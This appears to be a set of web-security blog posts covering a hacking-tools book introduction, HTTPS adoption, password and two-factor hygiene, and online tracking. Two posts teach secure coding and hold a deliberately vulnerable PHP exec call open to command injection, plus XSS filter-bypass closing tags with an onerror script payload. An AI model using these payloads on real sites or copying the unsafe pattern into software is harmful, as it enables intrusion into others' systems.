The Fourth Year of the Fourth Edition

Today is the fourth anniversary of the fourth edition of Anti-Hacker Tool Kit. Technology changes quickly, but many of the underlying principles of security remain the same. The following is an excerpt from the introduction.


Welcome to the fourth edition of the Anti-Hacker Tool Kit. This is a book about the tools that hackers use to attack and defend systems. Knowing how to conduct advanced configuration for an operating system is a step toward being a hacker. Knowing how to infiltrate a system is a step along the same path. Knowing how to monitor an attacker’s activity and defend a system are more points on the path to hacking. In other words, hacking is more about knowledge and creativity than it is about having a collection of tools.

Computer technology solves some problems; it creates others. When it solves a problem, technology may seem wonderful. Yet it doesn’t have to be wondrous in the sense that you have no idea how it works. In fact, this book aims to reveal how easy it is to run the kinds of tools that hackers, security professionals, and hobbyists alike use.

A good magic trick amazes an audience. As the audience, we might guess at whether the magician is performing some sleight of hand or relying on a carefully crafted prop. The magician evokes delight through a combination of skill that appears effortless and misdirection that remains overlooked. A trick works not because the audience lacks knowledge of some secret, but because the magician has presented a sort of story, however brief, with a surprise at the end. Even when an audience knows the mechanics of a trick, a skilled magician may still delight them.

The tools in this book aren’t magical; and simply having them on your laptop won’t make you a hacker. But this book will demystify many aspects of information security. You’ll build a collection of tools by following through each chapter. More importantly, you’ll build the knowledge of how and why these tools work. And that’s the knowledge that lays the foundation for being creative with scripting, for combining attacks in clever ways, and for thinking of yourself as a hacker.

I chose magic as a metaphor for hacking because it resonates with creative thinking and combining mundane elements to achieve extraordinary effects. Hacking (in the sense of information security) requires knowing how protocols and programs are put together, and the tools to analyze or attack them. I don’t have a precise definition of a hacker because one isn’t necessary. Consider it a title to be claimed or conferred.

Another reason the definition is nebulous is that information security spans many topics. You might be an expert in one, or a dabbler in all. In this book you’ll find background information and tools for most of those topics. You can skip around to chapters that interest you.

The Anti- prefix of the title originated from the first edition’s bias towards forensics and equating Hacker with Attacker. It didn’t make sense to change the title for a book that’s made its way into a fourth edition (plus I wanted to keep the skull theme cover). Instead, consider the prefix as an antidote to the ego-driven, self-proclaimed hacker who thinks knowing how to run canned exploits out of Metasploit makes them an expert. They just know how to perform a trick. Hacking is better thought of as understanding how a trick is put together, or being able to create new tricks on your own.

Each chapter should set you up with some of that knowledge. And even if you don’t recognize a magical allusion to Hermione, Tenar, or Gaius Helen Mohiam, there should be plenty of technical content to keep you entertained along the way. I hope you enjoy the book.

One Week Lasts All Year

The annual summer conference constellation of the week of Black Hat, BSides, and DEF CON usually brings out a certain vocal concern about personal device security. Some of the concern is grounded in wry humor, using mirth to illustrate a point. Some of it floats on ignorance tainted with misapplied knowledge. That’s fine. Perform the rituals and incantations that make you feel better. Enjoy the conferences, have fun, share some knowledge, learn some skills.

But after you select a level of extra precaution. Ask why such a choice is necessary for one week of the year. It’s a question without a single answer. As a leading question, it’s intended to elicit reasons based on a coherent threat model that addresses the week’s anticipated behaviors and environments. As an antagonistic question, it’s intended to explore why “default secure” is insufficient or why, after more than two decades of one-week-a-year concern, system and device security is so poor that none of it can be trusted outside your home network.

As you ponder an answer, take a moment to help someone else improve their baseline security profile.

  • For a mobile device, set a passcode longer than four characters.
  • For a mobile device, enable Touch ID or similar biometric feature.
  • Turn on automatic updates.
  • Enable multi-factor authentication (aka two-factor authentication, two-step verification) for all accounts that support it.
  • Record and save recovery codes associated with enabling MFA. Help them choose an effective storage, such as printed and placed somewhere safe or in a password-protected keychain.

As a follow-up to enabling MFA, help them update and make unique each of their passwords.

  • Install a password manager.
  • Starting with their most-used sites, go through the password change process and allow the password manager to assign a new, unique password. If they wish to have a memorable password, ensure that it’s only used for that account.
  • Review any OAuth or Social Logins used for the account, e.g. if they use Facebook, Twitter, LinkedIn, or similar to authenticate to the site or to allow access to their social account.

Now consider that there are people whose security precautions require attention 52 weeks of the year. People who have expressed an opinion. People who are women. People in abusive relationships. People without political representation, let alone power. These are different situations that need different approaches to securing devices and data.

These are people who can’t buy a “burner phone” for one week, then return to normal. Their normal isn’t the vague threat of a hostile network. It’s the direct threat from hostile actors – those with physical access to their devices, or maybe just knowledge of their passwords, or possibly just knowledge of their existence. But in each case an actor or actors who desire to obtain access to their identity, data, and accounts.

After helping someone with the basic security hygiene of setting strong passwords and turning on automatic updates, gather resources for how to deal with different threat models and different levels of concern. Help them translate those concerns into ways of protecting accounts and data.

One resource to start with could be

There’s a trope in infosec that this week has “the most hostile network” ever. A network may indeed be hostile, but a hostile playground network is far different from the threats against a network people use on a daily basis.

It can be fun as well as a great educational experience to attack a playground network. On the other hand, networks that no one can use or be expected to use aren’t reflective of security engineering. If you think a network can never be secured or a device never be safe, then you’ve possibly skipped over the exercise of threat modeling and making choices based on risk.

Builder, Breaker, Blather, Why.


I recently gave a brief talk that noted how Let’s Encrypt and cloud-based architectures encourage positive appsec behaviors. Check out the slides and this blog post for a sense of the main points. Shortly thereafter a slew of security and stability events related to HTTPS and cloud services (SHA-1, Cloudbleed, S3 outage) seemed to undercut this thesis. But perhaps only superficially so. Rather than glibly dismiss these points, let’s examine these events from the perspective of risk and engineering – in other words, how complex systems and software are designed and respond to feedback loops.

This post is a stroll through HTTPS and cloud services, following a path of questions and ideas that builders and breakers might use to evaluate security; leaving the blather of empty pronouncements behind. It’s about the importance of critical thinking and seeking the reasons why a decision comes about.

Eventually Encrypted

For more than a decade at least two major hurdles have blocked pervasive HTTPS: Certs and configuration. The first was (and remains) convincing sites to deploy HTTPS at all, tightly coupled with making deployment HTTPS-only instead of mixed with unencrypted HTTP. The second is getting HTTPS deployments to use strong TLS configurations, e.g. TLS 1.2 with default ciphers that support forward secrecy.

For apps that handle credit cards, PCI has been a crucial driver for adopting strong HTTPS. Having a requirement to use transport encryption, backed by financial consequences for failure, has been more successful than either asking nicely, raising awareness at security conferences, or shaming. As a consequence, I suspect the rate of HTTPS adoption has been far faster for in-scope PCI sites than others.

The SSL Labs project could also be a factor in HTTPS adoption. It distilled a comprehensive analysis of a site’s TLS configuration into a simple letter score. The publically-visible results could be used as a shaming tactic, but that’s a weaker strategy for motivating positive change. The failure of shaming, especially as it relates to HTTPS, is partly demonstrated by the too-typical disregard of browser security warnings. (Which is itself a design challenge, not a user failure.)

Importantly, SSL Labs provides an easy way for organizations to consistently monitor and evaluate their sites. This is a step towards providing help for migration to HTTPS-only sites. App owners still bear the burden of fixing errors and misconfigurations, but this tool made it easier to measure and track their progress towards strong TLS.

Effectively Encrypted

Where SSL Labs inspires behavioral change via metrics, the Let’s Encrypt project empowers behavioral change by addressing fundamental challenges faced by app owners.

Let’s Encrypt eases the resource burden of managing HTTPS endpoints. It removes the initial cost of certs (they’re free!) and reduces the ongoing maintenance cost of deploying, rotating, and handling certs by supporting automation with the ACME protocol. Even so, solving the TLS cert problem is orthogonal to solving the TLS configuration problem. A valid Let’s Encrypt cert might still be deployed to an HTTPS service that gets a bad grade from SSL Labs.

A cert signed with SHA-1, for example, will lower its SSL Labs grade. SHA-1 has been known weak for years and discouraged from use, specifically for digital signatures. Having certs that are both free and easy to rotate (i.e. easy to obtain and deploy new ones) makes it easier for sites to migrate off deprecated versions. The ability to react quickly to change, whether security-related or not, is a sign of a mature organization. Automation as made possible via Let’s Encrypt is a great way to improve that ability.


The recent work that demonstrated a SHA-1 collision is commendable, but it shouldn’t be the sudden reason you decided to stop using it. If such proof of danger is your sole deciding factor, you shouldn’t be using (or supporting) Flash or most Android phones.

Facebook explained their trade-offs along the way to hardening their TLS configuration and deprecating SHA-1. It was an engineering-driven security decision that evaluated solutions and chose among conflicting optimizations – all informed by measures of risk. Engineering is the key word in this paragraph; it’s how systems get built. Writing down a simple requirement and prototyping something on a single system with a few dozen users is far removed from delivering a service to hundreds of millions of people. WhatsApp’s crypto design fell into a similar discussion of risk-based engineering. Another example of evaluating risk and threat models is this excellent article on messaging app security and privacy.

Exceptional Events

Companies like Cloudflare take a step beyond SSL Labs and Let’s Encrypt by offering a service to handle both certs and configuration for sites. They pioneered techniques like Keyless SSL  in response to their distinctive threat model of handling private keys for multiple entities.

If you look at the Cloudbleed report and immediately think a service like that should be ditched, it’s important to question the reasoning behind such a risk assessment. Rather than make organizations suffer through the burden of building and maintaining HTTPS, they can have a service the establishes a strong default. Adoption of HTTPS is slow enough, and fraught with error, that services like this make sense for many site owners.

Compare this with heartbleed, which also affected TLS sites, could be more targeted, and exposed private keys (among other sensitive data). The cleanup was long, laborious, and haphazard. Cloudbleed had significant potential exposure, although its discovery and remediation likely led to a lower realized risk than heartbleed.

If you’re saying move away from services like that, what in practice are you saying to move towards? Self-hosted systems in a rack in an electrical closet? Systems that will likely degrade over time and, even more likely, never be upgraded to TLS 1.3? That seems ill-advised.


Does the recent Amazon S3 outage raise concern for cloud-based systems? Not to a great degree. Or, at least, not in a new way. If your site was negatively impacted by the downtime, a good use of that time might have been exploring ways to architect fail-over systems or revisit failure modes and service degradation decisions. Sometimes it’s fine to explicitly accept certain failure modes. That’s what engineering and business do against constraints of resource and budget.

Coherently Considered

So, let’s leave a few exercises for the reader, a few open-ended questions on threat modeling and engineering.

Flash has been long rebuked as both a performance hog and security weakness. Like SHA-1, the infosec community has voiced this warning for years. There have even been one or two (maybe more) demonstrated exploits against it. It persists. It’s embedded in Chrome, which you can interpret as a paternalistic effort to sandbox it or (more cynically) an effort to ensure YouTube videos and ad revenue aren’t impacted by an exodus from the plugin – or perhaps somewhere in between.

Browsers have had impactful vulns, many of which carry significant risk and impact as measured by the annual $50K+ rewards from Pwn2Own competitions. The minuscule number of browser vendors carries risk beyond just vulns, affecting influence on standards and protections for privacy. Yet more browsers doesn’t necessarily equate to better security models within browsers.

On the topic of decentralization, how much is good, how much is bad? DNS recommendations go back and forth. We’ve seen huge DDoS against providers, taking out swaths of sites. We’ll see more. But is shifting DNS the right solution, or a matter that misses the underlying threat or cause of such attacks? How much of IoT is new or different (scale?) compared to the swarms of SQL Slammer and Windows XP botnets of yesteryear’s smaller internet population?

Approaching these with ideas around resilience, isolation, authn/authz models, or feedback loops are (just a few) traits of a builder. As much as they might be for a breaker executing attack models against them.

Approaching these by explaining design flaws and identifying implementation errors are (just a few) traits of a breaker. As much as they might be for a builder designing controls and barriers to disrupt attacks against them.

Approaching these by dismissing complexity, designing systems no one would (or could) use, or highlighting irrelevant flaws is often just blather. Infosec has its share of vacuous or overly-ambiguous phrases like military-grade encryption, perfectly secure, artificial intelligence (yeah, I know, blah blah blah Skynet), use-Tor-use-Signal. There’s a place for mockery and snark. This isn’t concern trolling, which is preoccupied with how things are said. This is about the understanding behind what is said – the risk calculation, the threat model, the constraints.

Constructive Closing


I believe in supporting people to self-identity along the spectrum of builder and breaker rather than pin them to narrow roles. (A principle applicable to many more important subjects as well.) This about the intellectual reward of tackling challenges faced by builders and breakers alike, and leaving behind the blather of uninformed opinions and empty solutions.

I’ll close with this observation from Carl Sagan (from his book, The Demon-Haunted World): “It is far better to grasp the universe as it really is than to persist in delusion, however satisfying and reassuring.”

Our application universe consists of systems and data and users, each in different orbits. Security should contribute to the gravity that binds them together, not the black hole that tears them apart. Engineering sees the universe as it really is; shed the delusion that one appsec solution in a vacuum is always universal.

I'll ne'er look you i' the plaintext again

Look at this playbill: air fresheners, web security, cats. Thanks to Let’s Encrypt, this site is now accessible via HTTPS by default. Even better, WordPress serves the Strict-Transport-Security header to ensure browsers adhere to HTTPS when visiting it. So, whether you’re being entertained by odors, HTML injection, or felines, your browser is encrypting traffic.

deadliestwebattacks TLS

Let’s Encrypt makes this possible for two reasons. The project provides free certificates, which addresses the economic aspect of obtaining and managing them. Users who blog, create content, or set up their own web sites can do so with free tools. But the HTTPS certificates were never free and there was little incentive for them to spend money. To further compound the issue, users creating content and web sites rarely needed to know the technical underpinnings of how those sites were set up (which is perfectly fine!). Yet the secure handling and deployment of certificates requires more technical knowledge.

Most importantly, Let’s Encrypt addressed this latter challenge by establishing a simple, secure ACME protocol for the acquisition, maintenance, and renewal of certificates. Even when (or perhaps especially when) certificates have lifetimes of one or two years, site administrators would forget to renew them. It’s this level of automation that makes the project successful.

Hence, WordPress can now afford – both in the economic and technical sense – to deploy certificates for all the custom domain names it hosts. That’s what brings us to the cert for this site, which is but one domain in a list of SAN entries from deadairfresheners to a Russian-language blog about, inevitably, cats.

Yet not everyone has taken advantage of the new ease of encrypting everything. Five years ago I wrote about Why You Should Always Use HTTPS. Sadly, the article itself is served only via HTTP. You can request it via HTTPS, but the server returns a hostname mismatch error for the certificate, which breaks the intent of using a certificate to establish a server’s identity.


As with things that are new, free, and automated, there will be abuse. For one, malware authors, phishers, and the like will continue to move towards HTTPS connections. The key point there being “continue to”. Such bad actors already have access to certs and to compromised financial accounts with which to buy them. There’s little in Let’s Encrypt that aggravates this.

Attackers may start looking for letsencrypt clients in order to obtain certs by fraudulently requesting new ones. For example, by provisioning a resource under a well-known URI for the domain (this, and provisioning DNS records, are two ways of establishing trust to the Let’s Encrypt CA).

Attackers may start accelerating domain enumeration via Let’s Encrypt SANs. Again, it’s trivial to walk through domains for any SAN certificate purchased today. This may only be a nuance for hosting sites or aggregators who are jumbling multiple domains into a single cert.

Such attacks aren’t proposed as creaky boards on the Let’s Encrypt stage. They’re merely reminders that we should always be reconsidering how old threats and techniques apply to new technologies and processes. For many ”astounding” hacks of today (namely the proliferation of Named-Ones-Who-I-Shall-Not-Name), there are likely close parallels to old Phrack articles or basic security principles awaiting clever reinterpretation for our modern times.

Julius Caesar

Finally, I must leave you with some sort of pop culture reference, or else this post wouldn’t befit the site. This is the 400th anniversary of Shakespeare’s death. So I shall leave you with yet another quote. May it take us far less time to finally bury HTTP and praise the ubiquity of HTTPS.

Nay, an I tell you that, Ill ne’er look you i’ the face again: but those that understood him smiled at one another and shook their heads; but, for mine own part, it was Greek to me. I could tell you more news too: Marullus and Flavius, for pulling scarfs off Caesar’s images, are put to silence. Fare you well. There was more foolery yet, if I could remember it.

Julius Caesar. I.ii.278-284

You've Violated APE Law!

Developers who wish to defend their code should be aware of Advanced Persistent Exploitability. It is a situation where breaking code remains possible due to broken code.

La Planète des Singes

Code has errors. Writing has errors. Consider the pervasiveness of spellcheckers and how often the red squiggle complains about a misspelling in as common an activity as composing email. Mistakes happen; they’re a natural consequence of writing, whether code, blog, email, or book. The danger here is that in code these mistakes lead to exploits.

Sometimes coding errors arise from a stubborn refusal to acknowledge fundamental principles, as seen in the Advanced Persistent Ignorance that lets SQL injection persist almost a decade after programming languages first provided countermeasures. That vuln is so old that anyone with sqlmap and a URL can trivially exploit it.

Other coding errors are due to the lack of follow-through to address the fundamental causes of a vuln; the defender fixes the observed exploit as opposed to understanding and fixing the underlying issue. This approach fails when the attacker merely needs to tweak an exploit in order to compromise the vuln again.

We’ll use the following PHP snippet as an example. It has an obvious flaw in the arg parameter:

$arg = $_GET['arg'];
$r = exec('/bin/ls ' . $arg);

Confronted with an exploit that contains a semi-colon to execute an arbitrary command, a developer might remember to apply input validation. This is not necessarily wrong, but it is a first step on the dangerous path of the ”Clever Factor”. In this case, the developer chose to narrow the parameter to only contain characters.

$arg = $_GET['arg'];
# did one better than escapeshellarg
if(preg_match('/[a-zA-Z]+/', $arg)) {
    $r = exec('/bin/ls ' . $arg);

As a first offense, the regex should have been anchored to match the complete input string, i.e. '/^[a-zA-Z]+$/'. That mistake alone should dismiss this dev’s understanding of the problem and claim to a clever solution. But let’s continue the exercise with three more questions:

Is the intention clear? Is it resilient? Is it maintainable?

This developer declared they “did one better” than the documented solution by restricting input to mixed-case letters. One possible interpretation is that they only expected directories with mixed-case alpha names. A subsequent dev may point out the need to review directories that include numbers or a dot (.) and, as a consequence, relax the regex. That change may still be in the spirit of the validation approach (after all, it’s restricting input to expectations), but if the regex changes to where it allows a space or shell metacharacters, then it’ll be exploited. Again.

This leads to resilience against code churn. The initial code might be clear to someone who understands the regex to be an input filter (albeit an incorrect one in the first version). But the regex’s security requirements are ambiguous enough that someone else may mistakenly change it to allow metacharacters or introduce a typo that weakens it. Additionally, what kind of unit tests accompanied the original version? Merely some strings of known directories and a few negative tests with “./” and “..”? None of those tests would have demonstrated the vulnerability or conveyed the intended security aspect of the regex.

Code must be maintained over time. In the PHP example, the point of validation is right next to the point of usage. Think of this as the spatial version of the time of check to time of use flaw. In more complex code, especially long-lived code and projects with multiple committers, the validation check could easily drift further and further from the location where its argument is used. This dilutes the original developer’s intention since someone else may not realize the validation context and re-taint (such as with string concatenation with other input parameters) or otherwise misuse the parameter.

In this scenario, the solution isn’t even difficult. PHP’s documentation gives clear, prominent warnings about how to secure calls to the entire family of exec-style commands.

$r = exec('/bin/ls ' . escapeshellarg($arg));

The recommended solution has a clear intent – escape shell arguments passed to a command. It’s resilient – the PHP function will handle all shell metacharacters, not to mention the character encoding (like UTF-8). And it’s easy to maintain – whatever manipulation the $arg parameter suffers throughout the code, it will be properly secured at its point of usage.

It also requires less typing than the back-and-forth of multiple bug comments required to explain the pitfalls of regexes and the necessity of robust defenses. Applying a fix to stop an exploit is not the same as applying a fix to solve a vulnerability’s underlying problem.

There is a wealth of examples for this phenomenon, from string-matching alert to block cross-site scripting attacks to renaming files to prevent repeat exploitation (oh, the obscurity!) to stopping a service only to have it restart when the system reboots.

What does the future hold for programmers? Pierre Boule’s vacationing astronauts perhaps summarized it best in the closing chapter of La Planète des Singes:

Des hommes raisonnables ? … Non, ce n’est pas possible

May your interplanetary voyages lead to less strange worlds.

Bad Code Entitles Good Exploits

I have yet to create a full taxonomy of the mistakes developers make that lead to insecure code. As a brief note towards that effort, here’s an HTML injection (aka cross-site scripting) example that’s due to a series of tragic assumptions that conspire to not only leave the site vulnerable, but waste lines of code doing so.

The first clue lies in the querystring’s state parameter. The site renders the state’s value into a title element. Naturally, a first probe for HTML injection would be attempting to terminate that tag. If successful, then it’s trivial to append arbitrary markup such as <script> tags. A simple probe looks like this:

The site responds by stripping the payload’s </title> tag (plus any subsequent characters). Only the text leading up to the injected tag is rendered within the title.


This seems to have effectively countered the attack and not expose any vuln. Of course, if you’ve been reading this blog for any length of time, you’ll know this trope of deceitful appearances always leads to a vuln. That which seems secure shatters under scrutiny.

The developers knew that an attacker might try to inject a closing </title> tag. Consequently, they created a filter to watch for such things and strip them. This could be implemented as a basic case-insensitive string comparison or a trivial regex.

And it could be bypassed by just a few characters.

Consider the following closing tags. Regardless of whether they seem surprising or silly, the extraneous characters are meaningless to HTML yet meaningful to our exploit because they foil the assumption that regexes make good parsers.

<%00/title> <""/title> </title""> </title id="">

After inspecting how the site responds to each of the tags, it’s apparent that the site’s filter only expected a so-called “good” </title> tag. Browsers don’t care about an attribute on the closing tag. (They’ll ignore such characters as long as they don’t violate parsing rules.)

Next, we combine the filter bypass with a payload. In this case, we’ll use an image onerror event.

The attack works! We should have been less sloppy and added an opening <TITLE> tag to match the newly orphaned closing one. A good exploit should not leave the page messier than it was before.

<TITLE>abc</title id="a"><img src=x onerror=alert(9)> Vulnerable & Exploited Information Resource Center</TITLE>

The tragedy of this vuln is that it proves the site’s developers were aware of the concept of HTML injection exploits, but failed to grasp the fundamental characteristics of the vuln. The effort spent blocking an attack (i.e. countering an injected closing tag) not only wasted lines of code on an incorrect fix, but left the naive developers with a false sense of security. The code became more complex and less secure.

The mistake also highlights the danger of assuming that well-formed markup is the only kind of markup. Browsers are capricious beasts; they must dance around typos, stomp upon (or skirt around) errors, and walk bravely amongst bizarrely nested tags. This syntactic havoc is why regexes are notoriously worse at dealing with HTML than proper parsers.

There’s an ancillary lesson here in terms of automated testing (or quality manual pen testing, for that matter). A scan of the site might easily miss the vuln if it uses a payload that the filter blocks, or doesn’t apply any attack variants. This is one way sites “become” vulnerable when code doesn’t change, but attacks do.

And it’s one way developers must change their attitudes from trying to outsmart attackers to focusing on basic security principles.

A Monstrous Confluence

You taught me language, and my profit on’t 
Is, I know how to curse: the red plague rid you,
 For learning me your language! Caliban, (The Tempest, I.ii.363-365)

The announcement of the Heartbleed vulnerability revealed a flaw in OpenSSL that could be exploited by a simple mechanism against a large population of targets to extract random memory from the victim. At worst, that pilfered memory would contain sensitive information like HTTP requests (with cookies, credentials, etc.) or even parts of the server’s private key. (Or malicious servers could extract similarly sensitive data from vulnerable clients.)

In the spirit of Shakespeare’s freckled whelp, I combined a desire to learn about Heartbleed’s underpinnings with my ongoing experimentation with the new language features of C++11. The result is a demo tool named Hemorrhage.

Hemorrhage shows two different approaches to sending modified TLS heartbeats. One relies on the Boost.ASIO library to set up a TCP connection, then handles the SSL/TLS layer manually. The other uses a more complete adoption of Boost.ASIO and its asynchronous capabilities. It was this async aspect where C++11 really shone. Lambdas made setting up callbacks a pleasure — especially in terms of readability compared to prior techniques that required binds and placeholders.

Readable code is hackable (in the creation sense) code. Being able to declare variables with auto made code easier to read, especially when dealing with iterators. Although hemorrhage only takes minimal advantage of the move operator and unique_ptr, they are currently my favorite aspects following lambdas and auto.

Hemorrhage itself is simple. Check out the for more details about compiling it. (Hint: As long as you have Boost and OpenSSL it’s easy on Unix-based systems.)

The core of the tool is taking the tls1_heartbeat() function from OpenSSL’s ssl/t1_lib.c file and changing the payload length — essentially a one-line modification. Yet another approach might be to use the original tls1_heartbeat() function and modify the heartbeat data directly by manipulating the SSL* pointer’s s3->wrec data via the SSL_CTX_set_msg_callback().

In any case, the tool’s purpose was to “learn by implementing something” as opposed to crafting more insidious exploits against Heartbleed. That’s why I didn’t bother with more handshake protocols or STARTTLS. It did give me a better understanding of OpenSSL’s internals (of which I’ll add my voice to the chorus bemoaning its readability).

Audit Accounts, Partition Passwords, Stay Secure

It’s a new year, so it’s time to start counting days until we hear about the first database breach of 2014 to reveal a few million passwords. Before that inevitable compromise happens, take the time to clean up your web accounts and passwords. Don’t be a prisoner to bad habits.

There’s no reason to reuse a password across any account. Partition your password choices so that each account on each web site uses a distinct value. This prevents an attacker who compromises one password (hashed or otherwise) from jumping to another account that uses the same credentials.


At the very least, your email, Facebook, and Twitter accounts should have different passwords. Protecting email is especially important because so many sites rely on it for password resets.

And if you’re still using the password kar120c I salute your sci-fi dedication, but pity your password creation skills.

Next, consider improving account security through the following steps.

Consider Using OAuth — Passwords vs. Privacy

Many sites now support OAuth for managing authentication. Essentially, OAuth is a protocol in which a site asks a provider (like Facebook or Twitter) to verify a user’s identity without having to reveal that user’s password to the inquiring site. This way, the site can create user accounts without having to store passwords. Instead, the site ties your identity to a token that the provider verifies. You prove your identify to Facebook (with a password) and Facebook proves to the site that you are who you claim to be.

If a site allows you to migrate an existing account from a password-based authentication scheme to an OAuth-based one, make the switch. Otherwise, keep this option in mind whenever you create an account in the future.

But there’s a catch. A few, actually. OAuth shifts a site’s security burden from password management to token management and correct protocol implementation. It also introduces privacy considerations related to centralizing auth to a provider as well as how much providers share data.

Be wary about how sites mix authentication and authorization. Too many sites ask for access to your data in exchange for using something like Facebook Connect. Under OAuth, the site can assume your identity to the degree you’ve authorized, from reading your list of friends to posting status updates on your behalf.

Grant the minimum permissions whenever a site requests access (i.e. authorization) to your data. Weigh this decision against your desired level of privacy and security. For example, a site or mobile app might insist on access to your full contacts list or the ability to send Tweets. If this is too much for you, then forego OAuth and set up a password-based account.

(The complexity of OAuth has many implications for users and site developers. We’ll return to this topic in future articles.)

Two-Factor Auth — One Equation in Two Unknowns

Many sites now support two-factor auth for supplementing your password with a temporary passcode. Use it. This means that access to your account is contingent on both knowing a shared secret (the password you’ve given the site) and being able to generate a temporary code.

Your password should be known only to you because that’s how you prove your identity. Anyone who knows that password — whether it’s been shared or stolen — can use it to assume your identity within that account.

A second factor is intended to be a stronger proof of your identity by tying it to something more unique to you, such as a smartphone. For example, a site may send a temporary passcode via text message or rely on a dedicated app to generate one. (Such an app must already have been synchronized with the site; it’s another example of a shared secret.) In either case, you’re proving that you have access to the smartphone tied to the account. Ideally, no one else is able to receive those text messages or generate the same sequence of passcodes.

The limited lifespan of a passcode is intended to reduce the window of opportunity for brute force attacks. Imagine an attacker knows the account’s static password. There’s nothing to prevent them from guessing a six-digit passcode. However, they only have a few minutes to guess one correct value out of a million. When the passcode changes, the attacker has to throw away all previous guesses and start the brute force anew.

The two factor auth concept is typically summarized as the combination of “something you know” with “something you possess”. It really boils down to combining “something easy to share” with “something hard to share”.

Beware Password Recovery — It’s Like Shouting Secret in a Crowded Theater

If you’ve forgotten your password, use the site’s password reset mechanism. And cross your fingers that the account recovery process is secure. If an attacker can successfully exploit this mechanism, then it doesn’t matter how well-chosen your password was (or possibly even if you’re relying on two-factor auth).

If the site emails you your original password, then the site is insecure and its developers are incompetent. It implies the password has not even been hashed.

If the site relies on security questions, consider creating unique answers for each site. This means you’ll have to remember dozens of question/response pairs. Make sure to encrypt this list with something like the OS X Keychain.

Review Your OAuth Grants

For sites you use as OAuth providers (like Facebook, Twitter, Linkedin, Google+, etc.), review the third-party apps to which you’ve granted access. You should recognize the sites that you’ve just gone through a password refresh for. Delete all the others.

Where possible, reduce permissions to a minimum. You’re relying on this for authentication, not information leakage.


Universal adoption of HTTPS remains elusive. Fortunately, sites like Facebook and Twitter have set this by default. If the site has an option to force HTTPS, use it. After all, if you’re going to rely on these sites for OAuth, then the security of these accounts becomes paramount.

Maintain Constant Vigilance

Keep your browser secure. Keep your system up to date. Set a reminder to go through this all over again a year from now — if not earlier.

Otherwise, you risk losing more than one account should your password be exposed among the millions. You are not a number, you’re a human being.

Soylent Grün ist Menschenfleisch

Silicon Valley green is made of people. This is succinctly captured in the phrase: When you don’t pay for the product, the product is you. It explains how companies attain multi-billion dollar valuations despite offering their services for free. They promise revenue through the glorification of advertising.

Investors argue that high valuations reflect a company’s potential for growth. That growth comes from attracting new users. Those users in turn become targets for advertising. And sites, once bastions of clean design, become concoctions of user-generated content, ad banners, and sponsored features.

Population Growth

Sites measure their popularity by a single serving size: the user. Therefore, one way to interpret a company’s valuation is in its price per user. That is, how many calories can a site gain from a single serving? How many servings must it consume to become a hulking giant of the web?

Dystopian Books

You know where this is going.

The movie Soylent Green presented a future where a corporation provided seemingly beneficent services to a hungry world. It wasn’t the only story with themes of overpopulation and environmental catastrophe to emerge from the late ’60s and early ’70s. The movie was based on the novel Make Room! Make Room!, by Harry Harrison. And it had peers in John Brunner’s Stand on Zanzibar (and The Sheep Look Up) and Ursula K. Le Guin’s The Lathe of Heaven. These imagined worlds contained people powerful and poor. And they all had to feed.

A Furniture Arrangement

To sell is to feed. To feed is to buy.

In Soylent Green, Detective Thorn (Charlton Heston) visits an apartment to investigate the murder of a corporation’s board member, i.e. someone rich. He is unsurprised to encounter a woman there and, already knowing the answer, asks if she’s “the furniture.” It’s trivial to decipher this insinuation about a woman’s role in a world afflicted by overpopulation, famine, and disparate wealth. That an observation made in a movie forty years ago about a future ten years hence rings true today is distressing.

We are becoming products of web sites as we become targets for ads. But we are also becoming parts of those ads. Becoming furnishings for fancy apartments in a dystopian New York.

Women have been components of advertising for ages, selected as images relevant to manipulating a buyer no matter the irrelevance of their image to the product. That’s not changing. What is changing is some sites’ desire to turn all users into billboards. They want to create endorsements by you that target your friends. Your friends are as much a commodity as your information.

In this quest to build advertising revenue, sites also distill millions of users’ activity into individual recommendations of what they might want to buy or predictions of what they might be searching for.

And what a sludge that distillation produces.

There may be the occasional welcome discovery from a targeted ad, but there is also an unwelcome consequence of placing too much faith in algorithms. A few suggestions can become dominant viewpoints based more on others’ voices than personal preferences. More data does not always mean more accurate data.

We should not excuse an algorithm as an impartial oracle to society. They are tuned, after all. And those adjustments may reflect the bias and beliefs of the adjusters. For example, an ad campaign created for UN Women employed a simple premise: superimpose upon pictures of women a search engine’s autocomplete suggestions for phrases related to women. The result exposes biases reinforced by the louder voices of technology. More generally, a site can grow or die based on a search engine’s ranking. An algorithm collects data through a lens. It’s as important to know where the lens is not focused as much as where it is.

There is a point where information for services is no longer a fair trade. Where apps collect the maximum information to offer the minimum functionality. There should be more of a push for apps that work on an Information-to-Functionality relationship of minimum requested for the maximum required.

Going Home

In the movie, Sol (Edward G. Robinson) talks about going Home after a long life. Throughout the movie, Home is alluded to as the ultimate, welcoming destination. It’s a place of peace and respect. Home is where Sol reveals to Detective Thorn the infamous ingredient of Soylent Green.

Web sites want to be your home on the web. You’ll find them exhorting you to make their URL your browser’s homepage.

Home Page

Web sites want your attention. They trade free services for personal information. At the very least, they want to sell your eyeballs. We’ve seen aggressive escalation of this in various privacy grabs, contact list pilfering, and weak apologies that “mistakes were made.”

More web sites and mobile apps are releasing features outright described as “creepy but cool” in the hope that the latter outweighs the former in a user’s mind. Services need not be expected to be free without some form of compensation; the Web doesn’t have to be uniformly altruistic. But there’s growing suspicion that personal information and privacy are being undervalued and under-protected by sites offering those services. There should be a balance between what a site offers to users and how much information it collects about users (and how long it keeps that information).

The Do Not Track effort fizzled, hobbled by indecision of a default setting. Browser makers have long encouraged default settings that favor stronger security, they seem to have less consensus about what default privacy settings should be.

Third-party cookies will be devoured by progress; they are losing traction within the browser and mobile apps. Safari has long blocked them by default. Chrome has not. Mozilla has considered it. Their descendants may be cookie-less tracking mechanisms, which the web titans are already investigating. This isn’t necessarily a bad thing. Done well, a tracking mechanism can be limited to an app’s sandboxed perspective as opposed to full view of a device. Such a restriction can limit the correlation of a user’s activity, thereby tipping the balance back towards privacy.

If you rely on advertising to feed your company and you do not control the browser, you risk going hungry. For example, only Chrome embeds the Flash plugin. A plugin that eternally produces vulnerabilities while coincidentally playing videos for a revenue-generating site.

Lightbeam Example

There are few means to make the browser an agent that prioritizes a user’s desires over a site’s. The Ghostery plugin is an active counteraction to tracking; it’s available for all the major browsers. Mozilla’s Lightbeam does not block tracking mechanisms by default; it reveals how interconnected tracking has become due to ubiquitous cookies.

